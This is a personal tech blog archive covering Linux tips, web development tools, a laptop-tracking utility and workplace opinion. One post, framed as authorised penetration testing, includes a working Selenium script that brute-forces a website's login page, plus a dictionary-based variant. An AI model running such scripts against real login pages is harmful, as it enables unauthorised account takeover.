This blog has moved!

If you are not automatically redirected to the new address, please direct your browser to
http://www.juxtaservices.com/blog/
and update your bookmarks.

Sunday, July 20, 2008

Adeona. "Toto, I don't thinkpad we're in Kansas anymore."

The other day I found a snazzy little software tool for tracking a stolen (or interesting) laptop. I usually don't care much about software anymore unless it's open source, and in this case it is, so guess what?...I care!

Adeona was written by a few students at the University of Washington, which also happens to be the birthplace of another of my favorite little apps, BitTyrant (incidentally, both were sponsored by the same professor there...Go Arvind!!!). It is a surprisingly simple concept for tracking the previous and current digital whereabouts of a roaming laptop.

Adeona does the usual in reporting IP addresses that have been used to connect to the Internet, but most notable is the fact that it stores all data in the OpenDHT network. Basically, this is a massively distributed online storage system that can be written to over Sun RPC or XML-RPC, without the use of a specialized DHT client or an access account. What that essentially means is that access to the OpenDHT system can be fully anonymous. On top of that, Adeona encrypts all data that it stores inside OpenDHT, so that only the cryptographic credentials provided when setting it up can be used to read the data it stores.
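
Just to give a flavor of how simple the OpenDHT interface is, here's a rough sketch of a put and get against one of its XML-RPC gateways in Python. The gateway hostname, port, and method signatures below are pulled from my memory of the OpenDHT usage docs, so treat them as illustrative rather than authoritative (and note this has nothing to do with Adeona's own encrypted storage format):

import hashlib, xmlrpclib

# Talk to a public OpenDHT gateway over XML-RPC (hostname and port are
# the commonly published ones and may have changed)
gateway = xmlrpclib.ServerProxy("http://opendht.nyuld.net:5851/")

# Keys are limited to 20 bytes, so hashing an arbitrary string is the usual trick
key = xmlrpclib.Binary(hashlib.sha1("bitshifting-demo-key").digest())
value = xmlrpclib.Binary("any blob of data you want stored")

# put(key, value, ttl_in_seconds, application_name)
gateway.put(key, value, 3600, "bitshifting-demo")

# get(key, max_values, placemark, application_name) -> [values, placemark]
values, placemark = gateway.get(key, 10, xmlrpclib.Binary(""), "bitshifting-demo")
for v in values:
    print v.data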

I found the service remarkably simple to set up on my Ubuntu Hardy install. As mentioned here in the Linux install guide, I just had to untar the source code and compile it. I also had to install the libssl-dev package (OpenSSL development), but this was also indicated in the install procedures. Overall it took less than 5 minutes to get up and running. I then emailed myself a copy of the access credentials and we were off to the races.

I was interested to see what was being reported back by the system and how easy it was to retrieve, so I executed the following command as indicated in the documentation, and here are the results (I have removed my actual external IP. Yeah, I know the rest are there, but if you really wanted to know where I live, I'd probably tell you if you asked.):

compy:~$ /usr/local/adeona/adeona-retrieve.exe -r /usr/local/adeona/resources/ -l /home/bott/downloads/adeona/results/ -s /usr/local/adeona/adeona-retrievecredentials.ost -n 1
Please enter password for Adeona:
*******************************************************************************
* These results are for informational, research and evaluation purposes only. *
* Do not attempt to recover your lost or stolen laptop yourself. *
* If you believe your laptop has been stolen, contact the appropriate *
* law enforcement agency. *
*******************************************************************************


Searching for most recent 1 update(s) in time period [ 07/18/2008,22:54 (MDT) - NOW ]

Connecting to remote storage server...
Trying server 1...please be patient
Succesfully connected to remote storage server

Checking update scheduled on 07/20/2008,22:39 (MDT)
Succesfully retrieved update replica 0
===============================
Retrieved location information:
update time: 07/20/2008,22:39 (MDT)
internal ip: 192.168.1.105
external ip: *.*.*.*
access point: DAYS_INN
Nearby routers:
1 0.902ms 192.168.1.1 (could not resolve)
2 12.265ms 72.8.117.1 (1.117.8.72.dhcp.mstarmetro.net)
3 12.420ms 72.8.79.241 (241.79.8.72.dhcp.mstarmetro.net)
4 12.701ms 72.8.79.26 (V776-cbr02.vw.mstarmetro.net)
5 12.924ms 192.41.84.241 (pub-192-41-84-241.center7.com)
6 13.191ms 63.226.73.73 (slc-edge-10.inet.qwest.net)
7 25.332ms 67.14.32.202 (snj-core-02.inet.qwest.net)
8 25.964ms 205.171.214.46 (sjp-brdr-02.inet.qwest.net)
9 26.452ms 213.248.87.49 (sjo-bb1-link.telia.net)
10 87.022ms 80.91.248.189 (ash-bb1-link.telia.net)
11 163.948ms 213.248.65.209 (ldn-bb2-pos6-0-0.telia.net)
12 177.269ms 80.91.250.148 (hbg-bb1-link.telia.net)
13 200.930ms 80.91.250.133 (bpt-b2-link.telia.net)
14 200.401ms 213.248.79.2 (dante-ic-121273-bpt-b2.c.telia.net)
15 201.348ms 195.111.97.242 (c6513-tengbeth13-3.vh.hbone.hu)
16 202.461ms 195.111.97.102 (sup720-tengbeth2-1.bme.hbone.hu)
17 203.195ms 152.66.0.125 (tge8-1.taz.bme.hu)
18 193.745ms 152.66.0.122 (vlan13.ixion.bme.hu)


===============================
What I did find interesting about the results was the DAYS_INN access point registering in the system. I rarely use my wireless, and I guess the last time I did was at a Days Inn a couple months ago when I was out of town for a wedding. Although, to be honest, with as much family as we have had over this summer, it's kinda starting to feel like one around here too... At any rate, I give Adeona a double thumbs up. Definitely one of the cooler utils I've seen in a while. Although it occurred to me just now that, as secure as my password is, the dumbest of criminals may never find their way online with it anyhow. Oh well.


Friday, June 27, 2008

MagicJackin' a VM



So we all know how giddy I get over bargains (if not, consider this a news flash), and I found a great one the other day. The father of a buddy of mine told me about this snazzy new VOIP service called MagicJack. Basically it is a USB VOIP adapter that cost me ~$50 for a year's worth of service, which included the device and free unlimited calling anywhere in the US and Canada (right now the price for an additional year is $20, but I've learned not to buy ahead on service with startup VOIPs). Awesome deal, right?! That's what I said too. I mean, I am paying almost $20 a month for my current VOIP line at home. The only question for a tuxraider like me was...how hard would it be to get it working in Linux (I was confident there would be a way to do so)?

Well, after a little bit of probing I discovered that there was no native Linux version of the software...bummer. But I have had to run a Windows VM for a while now so that I could handle a few odd Windows-only tasks, so I figured it would be easy to just throw that puppy onto the VM and be off to the races. 'Twas not to be so easy.

I soon discovered that out of the box, VMWare Server does not have entirely stellar USB support when run inside Linux. It is fine for sharing a USB disk, but the MagicJack was fightin' back. So I began to poke around and finally figured out how to get it working inside of a Windows VM on Linux.

Here is my setup:
- Ubuntu 8.04 Hardy Heron Host OS (Should work on any Linux distro just the same)
- VMWareServer 1.0.6 build-91891
- Windows XP VM Guest OS
- MagicJack USB device

The real key to getting this to work was to make sure that the USB device could be shared by the VM and the host machine. Out of the box, my Windows VM could detect it, but it was not able to fully function. Here is what I added to /etc/fstab on the host machine to make it work:

# USB for vmware/vbox
none /proc/bus/usb usbfs devgid=46,devmode=664 0 0


If you are still having problems getting the MagicJack to work on a Windows VM in Ubuntu, I recommend setting the networking on the VM to bridged first, and then once it is working, switching it to NAT.

Now, since I'm the only one who has called my number, I just need someone else to call me up to make it a bargain worth its salt.


Yo, Yo, Yo

Yo, yo, yo catz. Man, it has been a long time since I have blogged here. Basically I think it comes down to one word: "thesis". It is done! In fact, that is pretty much old newz these days. I finished it up in December before Christmas, but basically, I haven't felt like composing since then. That, and I've been pretty busy with things at the now not-so-new job. Anyways, just in case you are in the mood for some heavy reading, here is the linky.


Friday, November 09, 2007

iPhone, uPhone, wwwe all Phone



Well, truth is, I don't have an iPhone, but I have friends that do. Yay for me! I happen to have a certain ongoing 4.5-year vendetta/boycott against AT&T for a long string of indifferent offenses against me long ago. I know it sounds like a family feud or something, but if I've ever told you why I will never shop for food at Kneaders, you will understand, because it's along the same lines. And on top of that, I currently have Verizon, which does not allow SIM card phones on its network, so that rules out the option of hacking an iPhone.

Anyways, yesterday an iPhone totin' friend of mine came to me with an intriguing question. He happened to have an HTML document that he wanted to view on his iPhone, except that it was unfortunately sized such that it was very inconvenient to navigate in the iPhone browser. He wanted to be able to access it without a connection to the internet, so he had installed Apache onto his iPhone to be able to serve up the HTML document locally; however, there still remained the issue of having to painfully resize each page of the document when viewing it. He had stooped so low that he finally came to me.

My first thought was to utilize some kind of global CSS, but after digging into it, I realized there is no way to do that without having to include the CSS in each file of the document. Not a very sexy solution. As I continued to think about it though, I realized that there must be some way to view the pages through an iframe in a new index page and, if necessary, resize the contents of the frame using JavaScript to suit the iPhone medium. My friend had informed me that there was some metadata that could be used to tell the iPhone to resize the contents of a page. So, here's what I came up with (with some tweaks he made once it was on his iPhone).

<html><head>
<title>Standard Works</title>
<meta name="viewport" content="width=320; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;">
</head><body>
<iframe name="iframeName" id="iframeName" src="realindex.html" marginwidth="0" marginheight="0" style="width: 310px;"></iframe>
</body></html>

It worked like a charm! Chalk another one up for the nerds. This could even be further enhanced to allow it to be dynamically passed a page to prevent sizing issues in any page being browsed. I'll let someone who actually has an iPhone tackle that.

Sunday, October 28, 2007

MyGeeQL

As a young, ambitious coder way back in the day, my very first dynamic web page was written in really awkward PHP with MySQL version point-something as the back end persistence. I should really try and dig up that code just for old time's sake. I'm sure it's still on a 3.5" "floppy" (they can hold thousands of pages of text...ok, maybe just hundreds) somewhere in my basement. Those were dark days.

Well MySQL has come a long way since then, and I'd be lying if I said it's not my de facto choice now for web development. In fact, I never had any real complaints about it. By the time I was using it for more enterprise-level systems, it had caught up in most ways. With the latest major release, MySQL 5.0, glorious enhancements like stored procedures, triggers, views, and transactions were introduced, creating more serious competition for larger commercial vendors. Well, I couldn't be more pleased with using it as the back end for an advanced web application. That was, until I found out about google-mysql-tools.

After reading an article the other day that describes a recent announcement that Google will be contributing some of its custom enhancements to the main MySQL code base, I discovered they have already released some fairly slick improvements for utilizing MySQL in a highly available, distributed environment. Since Google is considered by many to be the largest single user of MySQL, and they have successfully solved some rather difficult real-time web issues through their software, I figured this was well worth looking at.

Released as a patch that can be applied to MySQL 4 or MySQL 5, google-mysql-tools is aptly hosted on the Google Code website, and it offers some really slick enhancements to MySQL running on Linux with the InnoDB table structure. Some of these include partially synchronous replication between master and slave hosts, mirrored binlogs, replication of transactions, asynchronous background IO threads in InnoDB, and the monitoring of database activity on a per-user, per-table basis. I will definitely be applying this patch in my next MySQL 5 install.

Monday, July 02, 2007

The Other Bungee


It's hard to deny the impact of Bungie on the lives of techies and teenagers everywhere. The makers of one of the best-selling video game series in history have all but defined the first person shooter on the Xbox. Bungie Studios, the makers of the Halo series, know how to do it right. But look out, there's a new kid in town: Bungee Labs (which, by the way, is not affiliated with Bungie Studios). And we're talking about something a lot cooler than video games. I know, it's hard to fathom such a thing, but true it is.

I first heard about Bungee Labs through a former co-worker of mine who is now employed there as a quality assurance engineer. He has been telling me how impressive their service is, and the other day he invited me over to see a product demo. Their flagship product bundle, Bungee Connect, which debuted at the recent Web 2.0 conference, provides an entirely browser-based IDE and development environment for quickly and efficiently creating web-based applications. One of its most impressive features is the ability to automatically import any SOAP or REST web service and utilize its full functionality with a few clicks of the mouse. During the demo, in about 5 minutes, the presenter imported the recently announced eBay shopping API (it was unveiled at eBay Live about a month ago) and created a custom implementation of it that provided a search for products and subsequently displayed the images, product descriptions, pricing, etc. for the resulting products.

The most impressive part of the demo, however, was the fact that the IDE (called Bungee Builder) is built using Bungee Connect. As the demo went on I almost forgot it was running inside of a browser, because it functions like a full-featured client-side application. Bungee promises cross-browser compatibility for Builder and all applications it creates in Firefox, IE, and Safari. Another very innovative part of the Bungee service is the actual business model itself. Use of Builder and the application development and deployment cycle is completely free, with charges only accruing according to the amount of site usage.

The service is currently in Beta, so there are certainly more changes to come, but I have to say as a web developer, this is a very exciting piece of technology, and one which I look forward to utilizing.

Sunday, June 10, 2007

Favicon.ico 404 Errors

Upon recently perusing the Apache error/access logs within my sysadmin dominion, I discovered a massive number of 404 errors occurring. This was evidenced by hits on a custom 404 page, which a default script redirects to whenever a requested resource is not found. Since the 404 page was the result of a redirect, determining the offending URL meant scanning the access log for whatever the same IP had requested just before the 404 page was accessed. After briefly reviewing the access log, it became evident that the culprit was a request for favicon.ico in the root web folder.
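
If you ever want to automate that bit of log archaeology, here's a quick sketch of the idea in Python. The log path, log format, and the name of the custom 404 page below are made up for illustration, so adjust them to your own setup:

import re

LOG_FILE = "/var/log/apache2/access.log"   # hypothetical path
ERROR_PAGE = "/custom404.php"              # hypothetical custom 404 page

# Minimal parse of the common log format: client IP and requested path
line_re = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+)')

last_request = {}   # most recent request seen from each IP
culprits = {}       # requests that immediately preceded a hit on the 404 page

for line in open(LOG_FILE):
    m = line_re.match(line)
    if not m:
        continue
    ip, path = m.groups()
    if path.startswith(ERROR_PAGE):
        if ip in last_request:
            prev = last_request[ip]
            culprits[prev] = culprits.get(prev, 0) + 1
    else:
        last_request[ip] = path

# Print the most frequent offenders first
for path, count in sorted(culprits.items(), key=lambda x: -x[1]):
    print str(count) + "\t" + path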

Favicon.ico is the default means of displaying a custom icon in the URL bar of most modern web browsers. Most commercial websites populate this image with their corporate logo for further site recognition and customization. If you go to http://www.blogger.com, you will notice that the favicon is the orange Blogger "B". Well, apparently most web browsers will look for favicon.ico in the root of the web folder of the site being accessed. Because of the custom 404 scheme of the site in question, the lack of this file in said location was causing a 404 to occur. Upon doing a bit of digging, it was discovered that while there was a favicon being used, it was displayed using an alternate JavaScript method (probably for better cross-browser compatibility), and that indeed no favicon.ico file existed in the document root. This was remedied by creating a symlink in the document root pointing to the location the JavaScript solution was pulling the favicon from. This seems to have removed these 404 errors, making the remaining errors more discernible and hopefully easier to address.

Tuesday, May 08, 2007

Dump stderr to stdout

I recently discovered the solution to a previously baffling problem I was having with the code deployment tool I have been writing as part of my thesis research. By the way, Doba has graciously allowed me to open source the entire project. You can find it here.

Since the project relies on the execution of SVN commands through the use of the exec() function in PHP to perform actions dictated through the web interface, there are a lot of exec() calls made in the performance of duty. The output of these commands is generally captured so that it can be displayed back to the user and logged in the system. I was baffled, however, as to why sometimes when an SVN error occurred, it was not returned as output from the function call, but would instead be written to the Apache error log. That was until, while discussing the issue with a coworker, we stumbled upon the reason. The SVN client was writing the error to stderr instead of stdout! Hello!

In order to solve the problem, therefore, and thereby save myself from having to mow through a bunch of error logs when something failed, I simply had to make sure to redirect stderr to stdout for any SVN commands being executed. Here's what I appended to the end of the command to make it happen:

svncommand 2>&1

Since all of the SVN commands are executed through a central function, adding this redirect for all commands was a cinch. Now any and all errors encountered are properly displayed with the SVN output.
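
For what it's worth, the same trick applies to any wrapper that captures command output, not just PHP's exec(). Here's the idea sketched in Python rather than the PHP the project actually uses (the function name and the svn invocation are just stand-ins):

import subprocess

def run_svn(args):
    # Merge stderr into stdout so error text comes back with the command
    # output instead of vanishing into the web server's error log
    proc = subprocess.Popen(["svn"] + args,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT)
    output, _ = proc.communicate()
    return proc.returncode, output

code, out = run_svn(["status"])
print out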

The Flaming Cockroach

No, it's not some south-of-the-border concoction having to do with tequila. It does, however, have to do with debugging in Firefox. In fact, Firebug may be my most favorite Firefox plugin ever. It makes previously tedious web/browser debugging a cinch. Instead of a massive number of echo() or var_dump() calls, the current contents of any web page element can be easily inspected, including any and all JavaScript and CSS elements. I have found this tool to be invaluable when debugging AJAX calls since it handily displays all AJAX request results.

In addition to the integrated inspector, Firebug also allows the live alteration and debugging of HTML, CSS, and JavaScript. There is also a graphical means of displaying CSS box layout to help show you how things are aligned, as well as the ability to profile page performance and the time it takes various components of the page to run. One of Firebug's most helpful pieces of functionality for DHTML and JavaScript-rich web applications is the ability to inspect and edit the DOM, which can be difficult to debug manually.

If you do any significant amount of web development and it's not already in your development arsenal, Firebug is really something you should not be without.

Monday, May 07, 2007

Google Codeage

Recently I went poking around in the "Google extras" section and found some nifty new tools and open source code snippets. Below are some of the highlights:

Send to phone (http://www.google.com/tools/firefox/sendtophone/index.html)
This snazzy Firefox plugin allows you to highlight text on a webpage and then send it via text message to any mobile number. It's a pretty slick way of sending free text messages to your friends, since once you select text, you can edit the message before it's sent.

Picasa (http://picasa.google.com/linux/)
This is an older piece of open source Google software that provides an excellent app for photo management and simple editing. If you haven't ever checked it out, it is really worth it. There is even a Linux version!

Google Maps (http://maps.google.com/maps)
If you're still using MapQuest, you are living in the stone ages. Google Maps utilizes an AJAX interface to allow real-time scrolling of the map. I've never tried to scroll all the way around the world, but I have a feeling it would work!

Kongulo (http://code.google.com/p/google-kongulo/)
This neat little plugin for Google Desktop allows you to spider and index a specific URL, thereby making it searchable by Google Desktop. It is optimized to allow speedy re-indexing of the site by only handling changes since the last index.

Real Time Syntax Highlighting JavaScript (http://code.google.com/p/rtshjs/)
This is one of the slickest pieces of code I found on the site. It is a piece of JavaScript that will automatically highlight code syntax in an HTML page, based on the programming language used. It will end up looking like the code would appear in an IDE like Eclipse, making it really slick for web pages that embed code snippets.

To complement these handy projects and open source code components, there are constantly new projects emerging that can be tracked on one of the many related Google blogs. A few of my favorites are:

Google Code Blog
Google Web Toolkit Blog
Google Testing Blog (This one is really good!)

Tuesday, April 17, 2007

Securing the World One Way or Another - Penetration Testing Using Selenium


Security is a big area of interest for me as a techie. There's just nothing like the feeling you get from crafting some clever mechanism to bypass someone's (usually poor) attempts at security, or the exhilaration of successfully tweaking something to make it work other than the way it was intended. On the flip side, it is really a pretty crappy feeling when something has been hacked and you are the one who has to figure out how and create a damage report. I would much rather see things secured from the get-go.

That said, I wanted to share a new tool that I discovered and implemented the other day to do some brute force penetration testing on a website that I was auditing. It is actually a tool used to automate UI testing of web based applications, and was shown to me by a QA buddy of mine. It's called Selenium and is a piece of open-source software built in Java.

There are actually several components to the Selenium package that make it a really great automated testing suite. The first of these is called Selenium IDE, and it runs as a Firefox plugin allowing you to record and edit Selenium test scripts. This is really slick for creating quick and dirty web app tests. There is also another tool called Selenium RC, which is what I ended up using for my penetration testing. From the about page: "Selenium Remote Control is a test tool that allows you to write automated web application UI tests in any programming language against any HTTP website using any mainstream JavaScript-enabled browser." That pretty much sums up this glorious piece of software.

To run it, you just fire up the Java server process and then run a test script written in one of a number of common scripting languages (one that utilizes the corresponding Selenium interface object for that language), and the script will fire up a browser and run your tests against the target URL. Languages with current support include Java, .NET, Perl, PHP, Python, and Ruby. There is even support for SSL sites through the clever use of some proxy techniques.

The script I used for my testing was written in Python and basically just accessed the target login page, iterating through a list of passwords until it found one that logged in successfully. Since security was very minimal, it didn't take long to succeed. The script itself was very simple as well, as you can see:


from selenium import selenium
import unittest, os, time

class Cracker(unittest.TestCase):
    def setUp(self):
        # Connect to the Selenium RC server and point it at the target site
        self.selenium = selenium("localhost", 4444, "*firefox /usr/lib/firefox/firefox-bin", "http://www.targeturl.com")
        self.selenium.start()

    def test_new(self):
        sel = self.selenium

        user = "bryce@targeturl.com"

        # Try every three-digit password (100-999) until one logs in
        for i in range(100, 1000):
            sel.open("/login.aspx")
            sel.type("username", user)
            sel.type("password", str(i))
            sel.click("Button1")
            sel.wait_for_page_to_load("30000")

            #time.sleep(1)

            if sel.is_text_present("Your login credentials were not correct. Please try again"):
                print "Failed, trying password: " + str(i)
            else:
                print "Success, your password is: " + str(i)
                break

    def tearDown(self):
        self.selenium.stop()

if __name__ == "__main__":
    unittest.main()


The password domain in this case was fairly small (100-999), but this script could easily be altered to read in a dictionary file or a programmatic list of brute force passwords. With the Selenium RC server process running, all I had to do was fire off the Python script (python hackscript.py) and away it ran.
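
For example, swapping the three-digit loop for a wordlist is only a few lines; the test_new method in the Cracker class above would become something like this (wordlist.txt is a hypothetical file with one candidate password per line):

    def test_new(self):
        sel = self.selenium
        user = "bryce@targeturl.com"

        # Read candidate passwords from a dictionary file, one per line
        passwords = [line.strip() for line in open("wordlist.txt") if line.strip()]

        for password in passwords:
            sel.open("/login.aspx")
            sel.type("username", user)
            sel.type("password", password)
            sel.click("Button1")
            sel.wait_for_page_to_load("30000")

            if sel.is_text_present("Your login credentials were not correct. Please try again"):
                print "Failed, trying password: " + password
            else:
                print "Success, your password is: " + password
                break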

The server can be a little tricky to get running, but I found that the instructions in the Tutorial and Troubleshooting Guide solved any problems I encountered. (If you are running in Linux and you have to update your firefox-bin path, don't forget to reload the PATH variable using 'source ~/.bash_profile'.) If you would like to run the latest version (this may be necessary if you are using a Firefox version higher than 2.0), you can find the server.jar file here. Just replace it in the unzipped structure and you should be set.

Tuesday, March 27, 2007

Ladies and Gentlemen, What You've All Been Waiting For...The Chumby

If you haven't figured it out yet, I have several technical interests. Two of these are security and hacking. Interestingly, the word "hacking" has inherited several definitions in addition to the most commonly known one used to refer to the nefarious and often illegal intrusion of secured computer systems. In a general sense it is basically a creative or ingenious way of modifying something to be used differently than what was intended. There's tunnel hacking, life hacking, and of course technology hacking. This creative way of looking at new solutions to problems, even exploiting and enhancing a current solution, is more of what I mean when I say that hacking interests me. In particular, I find hardware hacking to be a fascinating subject.

That is exactly why I was so excited about a year or so ago (maybe longer, who knows) when I heard about the Chumby. It's a hardware hacker's dream. Who in the world of personal digital devices is not sick of DRM and other proprietary limitations placed on them through their devices? Chumby is entirely open source, which is what makes it so exciting. And not just the software it runs, either. In a completely unprecedented move in modern consumer electronics, Chumby Corp has even released the hardware schematics for the device, allowing anyone with the will to improve, enhance, and expand its functionality.

The device contains a 266 MHz ARM processor, 32 MB SDRAM, a 3.5" touch LCD, wireless, and several sensors, runs on Linux, and has been designed to run Flash widgets, play MP3s, and accomplish several other interesting tasks. Check out their website, which has links to the Chumby forums and wiki, for more info.

International Nerdery


It's official. I'm international. A quick look today at my Google Analytics page told me so. I have a whole slew of visitors from Europe who have checked out several of my Ubuntu posts, among other things. Now I'm just waiting to break into the Asian market.

If you've never used Google Analytics before, you are missing out on one of the best free webmaster tools on the net. Check it out at http://www.google.com/analytics/. In order to use it, all you have to do is insert some JavaScript into your site, which helps catalog information about traffic to the site. Provided with the tool is a full site statistics suite that includes reporting on referrers, number of hits, repeat visitors, and even geographic locations, to mention only a few.

So, according to Analytics at bitshifting.blogspot.com, I am a lot more popular than I thought. Inspired by my newly discovered popularity, I have resolved to post more often. That said, the one thing that Google Analytics doesn't really tell me is what people who visit bitshifting want to see more of. So here's your chance to give me suggestions on what you'd like to see me blog about. Maybe it's more of what I spend my free time doing. Maybe it's more of what I spend my professional time doing. Maybe you've got a technology-related problem. Just post a comment with any feedback or suggestions you may have and I'll work on getting you a response. Here's to all those lonely Asian nerds who don't know what they're missing. Yet.

Saturday, March 10, 2007

The Myth of the Nazarene Welder


It's been a while since I've posted. What percentage of my posts start out like that? It must be close to a hundred percent, at least in my mind before I start typing. Well, it's March already, so it's too late to make that a New Year's resolution. Maybe I can make it a part of spring fever. We'll see what happens. On to the task at hand, however.

Prepare yourself, because I'm about to enter the realm of pointy-haired thought and discuss something a manager would talk about. I know this isn't my normal geeky train of thought, but I think it's worth visiting from time to time. I've had this idea for some time now about the assignment of tasks and how it relates to what I like to call the Myth of the Nazarene Welder.

Whether or not you agree in principle with the religious affiliation, you are most likely at least familiar with the vocational endeavors of the most renowned personage from Nazareth. In case you are not, I'll give it to you straight. Jesus was a carpenter. We'll now set aside all further mention of religious figures and talk about carpentry.

When I was growing up, there was a period of several years when my father, who is a petroleum geologist, used to make yearly trips to Singapore and Malaysia for business. He would return with some fabulous local souvenirs and art pieces, which included some amazingly intricate carvings in exotic species of hardwood. I remember thinking how much skill and time those must have taken to create. Similarly, I recently attended a display at the local university's art museum by a local artist, Andrew Smith, and his father, called "Poetic Kinetics", which was a fascinatingly elaborate collection of mechanical pieces that basically consisted of a bunch of scrap metal cleverly welded into moving sculptures. Both of these works captured my artistic fascination. Imagine for a moment, however, that these two artists were to swap mediums. I'm sure to some extent the results would be similar in their level of detail and artistic nature, but I imagine that neither would have found its way onto my mother's mantel or the floor of a prestigious art museum.

What is the moral of this story then? Let people do what they are good at. It seems to be fairly popular in a lot of organizations to try and "let people experience different things" and "increase their skillset" or "become familiar with other parts of the system", which I am certainly not against, but too often I think it is taken too far. It's too much like asking a welder to build a set of stairs. Out of wood. He'll always be one step behind. Like a welder building a set of stairs.

Let me provide an example of this myth in action. Let's say your company has several developers, all hired as either UI developers or back end programmers, but now you have a real need for a Database Administrator. Instead of trying to take one of your current welders and have them perform DB carpentry, you should just go out and hire a DBA! People generally end up in careers that they have chosen and enjoy, and trying to get them to do other things generally results in a lot of spinning wheels and usually subpar results. While this often seems like a cheaper alternative, that's part of the myth. In the long run carpenters can't be good welders, and they will either just quit trying or turn out shoddy work indefinitely.

Here's another, not so obvious example. Let's say you have two groups of developers. One group has just completed a system for tracking customer orders within the company. The other, an API used by advanced customers to integrate their websites with your company's. Management decides that parties from both sides need to be familiar with the systems from the other (this is particularly common when the groups involved are single developers) because they are worried about what will happen to the application's knowledge base if one or more developers leaves the company. To effect a transfer of knowledge between the two sides, they decide that incoming defects will be fixed by the opposite party. What's the result?

Well, if the systems are not very complicated (haha, that's a hilarious thought!), the new project owners will quickly learn the ins and outs of the system and then everyone will know everything about the entire codebase. That's another part of the myth. The whole reason management worries about losing people is because the systems are sufficiently complicated that doing so would cause a lot of downtime to get someone else up to speed. While a lot of management's job is to hedge its bets and cover all the bases in the event of disaster, too often in this situation the drawbacks of this approach are ignored.

The first consequence of living the welding-carpenter myth is that there is an immediate loss of productivity as people try to get familiar with their new assignments. Instead of taking the code's original author 15 minutes to find and fix the defect, it takes the new owner 2 hours to fix it, including an hour of time they spend bothering the author with questions about the system and possible reasons for the defect. Consequently, there is also an opportunity cost involved. The more time the new owner spends on the new system, the less they will remember about the system they authored, so in this case there is a double whammy of productivity loss.

Another issue with this myth is that the real reasoning behind it is to try and prevent knowledge loss if personnel leave the company. This is certainly inevitable to some extent, but there is an awfully high price being paid to try and mitigate that risk. Is it worth it? I guess it depends on the company's effectiveness at initiating attrition. Certainly they will be better at that if they try and push people to do things that frustrate them or fall outside their skillset (like throwing them into a new foreign code base or project every 6 months).

What then should be done to prevent this perversion of vocational assignment? Instead of trying to hedge the bets of attrition through reassignment that results in double-sided inefficiencies, it would be much more efficient to focus all those efforts on a rigorous policy of documentation that prevents knowledge loss as development proceeds. I won't go into detail in this post on my thoughts about how best to incite documentation (I will say that wikis are amazingly effective), but having policies in place that ensure proper systems documentation should tide the knowledge base over until other employees can come up to speed on the insights that were lost by an employee leaving. The second amazingly effective thing that can be done is to work harder at not losing employees! No, really. Try it. Better compensation, benefits, or even something as simple as newer hardware, a company game room, or a popcorn machine will go a long way towards keeping people around.

Wednesday, January 31, 2007

Nvidia Kernel Upgrade Woes



I've spent the last several hours of rather frustrating personal computing time trying to get my Nvidia driver up and running again after doing an apt upgrade that included a new kernel. At first there just wasn't a version of 'nvidia-glx' linked to the newest kernel package (this was the method I originally used to install the driver), so I went back to using the crappy 'vesa' driver for a week or so, hoping they would fix the linkage issue. That they did, but I soon discovered that this new version of the driver was incompatible with my graphics card, an apparently now outdated Nvidia 440 Go.

So began my epic journey to install the archived version of my beloved driver. I started out going to the Nvidia site http://www.nvidia.com/object/unix.html and downloading the Linux AMD64 driver version 1.0-9631. After checking out the documentation, it all seemed pretty straightforward. That sounds pretty hilarious now. Like I said, the next few hours were spent trying to get it working. At one point I had it installing, but the module would not properly reload upon a reboot, so I was all set if I wanted to reinstall the driver every time I booted. No thanks.

To make a long story short, I finally found a solution. It appears that the default modules and junk that were installed mostly with 'linux-restricted-modules' were preventing the new module from being properly linked. Here's the enlightening site that provided my blessed solution: http://doc.gwos.org/index.php/BerylOnEdgy

The steps I used are as follows:
1. 'sudo nano /etc/modules'. Add the 'nvidia' module to the list.
2. 'sudo nano /etc/default/linux-restricted-modules-common'. Make sure the file looks like: 'DISABLED_MODULES="nv"'
3. Press 'ctrl-alt-F2' to open a new terminal, and enter the following:
sudo apt-get install linux-headers-`uname -r` build-essential gcc gcc-3.4 xserver-xorg-dev
sudo apt-get --purge remove nvidia-glx nvidia-settings nvidia-kernel-common
sudo rm /etc/init.d/nvidia-*
sudo /etc/init.d/gdm stop
sudo sh NVIDIA-Linux-x86-1.0-9631-pkg2.run
sudo nvidia-xconfig --add-argb-glx-visuals
sudo /etc/init.d/gdm start

4. Reboot the computer and it should come up.

It has been stated that this process must be repeated each time the kernel is updated, which isn't ideal, but now that I've figured out how to do it, it shouldn't be as bad next time.

Oh, and as a side note, I'm back to seeing things in German (see my last post), so this post should be Uber impressive.